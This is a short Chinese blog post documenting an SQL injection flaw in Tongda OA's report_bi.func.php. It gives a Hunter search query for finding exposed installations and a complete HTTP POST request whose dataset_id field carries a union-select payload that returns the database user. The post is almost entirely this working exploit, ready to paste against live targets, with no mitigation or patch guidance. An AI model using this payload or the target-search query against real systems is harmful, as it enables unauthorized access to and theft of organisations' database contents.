Babing
Published on 2024-08-30 / 2 Visits
0
0

T10-6通达-OA-SQL

T10-6通达-OA-SQL

漏洞描述:

通达OA report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

网站图片:

image-20240625142238152

网络测绘:

Hunter 语法:

app.name=“通达 OA”

漏洞复现:

payload:

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Go-http-client/1.1
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_POST[dataset_id]=efgh'-@`'`)union select 1,2,user()#'&action=get_link_info&

效果图:
image.png


Comment